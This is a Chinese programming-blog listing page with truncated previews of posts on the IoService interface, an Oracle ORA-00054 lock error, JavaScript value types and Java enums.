    1.前言。   如题。 2.代码。   IoService IoService是一个接口,有两种实现:IoAcceptor和IoConnector;其中IoAcceptor是针对Server端的实现,IoConnector是针对Client端的实现;IoService的职责包括: 1、监听器管理 2、IoHandler 3、IoSession
  • ORA-00054:resource busy and acquire with NOWAIT specified Everyday都不同 oraclesessionLock
    [Oracle] 今天对一个数据量很大的表进行操作时,出现如题所示的异常。此时表明数据库的事务处于“忙”的状态,而且被lock了,所以必须先关闭占用的session。   step1,查看被lock的session:   select t2.username, t2.sid, t2.serial#, t2.logon_time from v$locked_obj
  • javascript学习笔记 tntxia JavaScript
      javascript里面有6种基本类型的值:number、string、boolean、object、function和undefined。number:就是数字值,包括整数、小数、NaN、正负无穷。string:字符串类型、单双引号引起来的内容。boolean:true、false object:表示所有的javascript对象,不用多说function:我们熟悉的方法,也就是
  • Java enum的用法详解 xieke90 enum枚举
    Java中枚举实现的分析:     示例:  public static enum SEVERITY{ INFO,WARN,ERROR }     enum很像特殊的class,实际上enum声明定义的类型就是一个类。 而这些类都是类库中Enum类的子类      (java.l
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他